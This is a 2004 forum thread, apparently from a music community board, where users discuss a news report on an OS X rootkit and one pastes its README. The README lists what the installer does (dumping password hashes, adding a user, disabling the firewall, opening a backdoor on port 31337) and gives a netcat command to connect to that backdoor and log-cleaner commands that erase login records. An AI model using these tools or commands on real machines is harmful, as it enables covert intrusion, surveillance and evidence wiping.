Site New Answers Search Boards ILM ILE Answers New Question New Questions New Poll Blog View Register Login

MAC OS X H4XX0R trouble bubble bobble

Message Bookmarked
Bookmark Removed
http://www.theregister.co.uk/2004/10/25/mac_rootkit_opener/

TOMBOT, Tuesday, 26 October 2004 13:29 (twenty-one years ago)

It does take an administrator password to install it though and it doesn't auto propegate.

Ed (dali), Tuesday, 26 October 2004 13:36 (twenty-one years ago)

Yeah it's just a payload really. Privilege escalation is usually part of an exploit, this is a stepping stone. Still exciting and possibly fun, I am going to find a copy if I can and email it to myself.

TOMBOT, Tuesday, 26 October 2004 13:41 (twenty-one years ago)

###################################
# osxrk : OS X - Rookit
#
# the burning man )'( - Public Release 0.2.1
# Sept. 2004
#
# by g@pple
#
# greets and thanks to Dim Bulb, Dr. Springfield, Jawn Doh!, B-r00t!,
# the fbsdrk & fbsdrootkit teams for inspiration.
#

This is the initial Public Release of the OS X RootKit. This type of rootkit should be easy to defend against if you really care about your computer. Keep your system up to date and patched.


- g@pple

"a rootkit is a collection of tools that is copied to the compromised system after after root access already has been gained. Its purpose is after the fact, and it is designed to provide to the intruder the maximum benefit of of the use of the compromised machine by maintaining the intruder's anauthorized access and allowing the intruder to act without being detected."
- A Limited Taxonomy of Traditional Rootkits by Amanda J. Rankhorn


install.sh script
-----------------

Install.sh does the following:

- outputs some user and system info.
- outputs the paswd hashes
- checks for opener already being installed
- looks for remote logging
- installs a new user
- turns on ssh
- turns off the firewall
- installs some tools (see below)
- install Opener tool (see below)
- installs and start xinted backdoor on 31337
- grabs a screenshot
- deletes install package

rootkit contents
----------------

backd - xinted tcp backdoor on port 31337 by pWr & g@pple
(source code included) works on OS X 10.3.x
$ nc REMOTEHOSTIP 31337

nc - netcat 1.10 by Hobbit
(source code included)
NetCat is the shit, so many uses - read the source.

diepu - die putze log cleaner 0.6 by genius
(source code included, build for FreeBSD)

$ sudo ./pu -u LDAP-daemon #removes username LDAP-daemon from utmp
$ sudo ./pu -w LDAP-daemon #removes last entry from wtmp
$ sudo ./pu -l LDAP-daemon #removes username LDAP-daemon from lastlog entry

opener - unmodified version 2.38 by DimBulb & Jawn Doh!

Opener is a multi-purpose startup script to turn on services and gather user
info & hashes for Mac OS X

- gathers system & user info, password hashes, serial numbers,
adds new user, turns on services and much more.

- downloads and installs at startup :
- osxphone for remote audio monitoring
- dsniff for local network password sniffing
- john the ripper to crack local machine hashes

TOMBOT, Tuesday, 26 October 2004 13:43 (twenty-one years ago)


You must be logged in to post. Please either login here, or if you are not registered, you may register here.
Site New Answers Search Boards ILM ILE Answers New Question New Questions New Poll Blog View Register Login